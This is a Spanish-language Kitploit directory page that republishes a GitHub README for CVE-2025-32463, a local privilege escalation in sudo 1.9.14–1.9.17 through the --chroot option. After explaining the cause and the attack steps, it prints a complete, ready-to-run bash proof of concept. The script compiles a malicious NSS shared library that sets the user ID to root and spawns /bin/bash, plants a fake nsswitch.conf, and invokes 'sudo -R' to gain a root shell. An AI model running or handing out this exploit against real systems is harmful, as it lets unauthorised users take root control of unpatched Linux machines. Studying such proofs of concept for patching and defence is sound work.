Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32463 — Exploit de prueba de concepto para CVE-2025-32463, una escalada de privilegios local en sudo 1.9.14-1.9.17 mediante configuración incorrecta de chroot e inyección de biblioteca NSS maliciosa. | Kitploit
Herramientas/GitHubGitHub/mr-alperen/cve-2025-32463
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPapers e InvestigaciónAprendizaje y EducaciónExplotación de Binarios
GitHubmr-alperen/cve-2025-32463

CVE-2025-32463

Exploit de prueba de concepto para CVE-2025-32463, una escalada de privilegios local en sudo 1.9.14-1.9.17 mediante configuración incorrecta de chroot e inyección de biblioteca NSS maliciosa.

Ver Repositorio
8hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

📌 CVE-2025-32463 — Escalada Local de Privilegios de Sudo --chroot

ID de ExploitDB: 52352


🧠 Visión General

Este repositorio documenta una vulnerabilidad crítica de escalada de privilegios local (LPE) que afecta a las versiones Sudo 1.9.14 – 1.9.17.

La vulnerabilidad se debe a una implementación incorrecta de la opción sudo -R (--chroot) y permite al atacante ejecutar comandos con privilegios de root, aunque no esté autorizado en el archivo sudoers.

🔥 Resultado: Usuario no autorizado → shell root


🧩 Componente Afectado

  • Software: sudo
  • Versiones afectadas:
    • 1.9.14
    • 1.9.15
    • 1.9.16
    • 1.9.17
  • CVE ID: CVE-2025-32463
  • Plataforma: Linux (especialmente sistemas que usan NSS)
  • Sistema probado: Kali Rolling 2025

⚙️ Causa Técnica de la Vulnerabilidad

El parámetro --chroot (-R) de Sudo permite al usuario ejecutar comandos dentro de un directorio raíz definido por él mismo.

Sin embargo, como resultado de un cambio introducido en sudo 1.9.14:

  • Antes de que el archivo sudoers se valide por completo
  • la llamada a chroot() se realiza sobre el directorio especificado por el usuario

Esta situación permite que, a través de un archivo falso creado por el atacante:

/etc/nsswitch.conf

se cargue una biblioteca NSS maliciosa (libnss_*.so) con privilegios de root.


🧨 Escenario de Ataque (Resumen)

  1. Se crea un directorio temporal
  2. Se prepara un nsswitch.conf falso
  3. Se compila una biblioteca compartida NSS maliciosa
  4. Se realiza la llamada sudo -R <dir> <command>
  5. La biblioteca NSS se carga con privilegios de root
  6. Se obtiene una shell root 🚀

🧪 Prueba de Concepto (PoC)

⚠️ Utilícelo únicamente en entornos educativos y de pruebas

#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463

set -e

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"

cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash","/bin/bash",NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc

gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

sudo -R woot woot
Descargar herramienta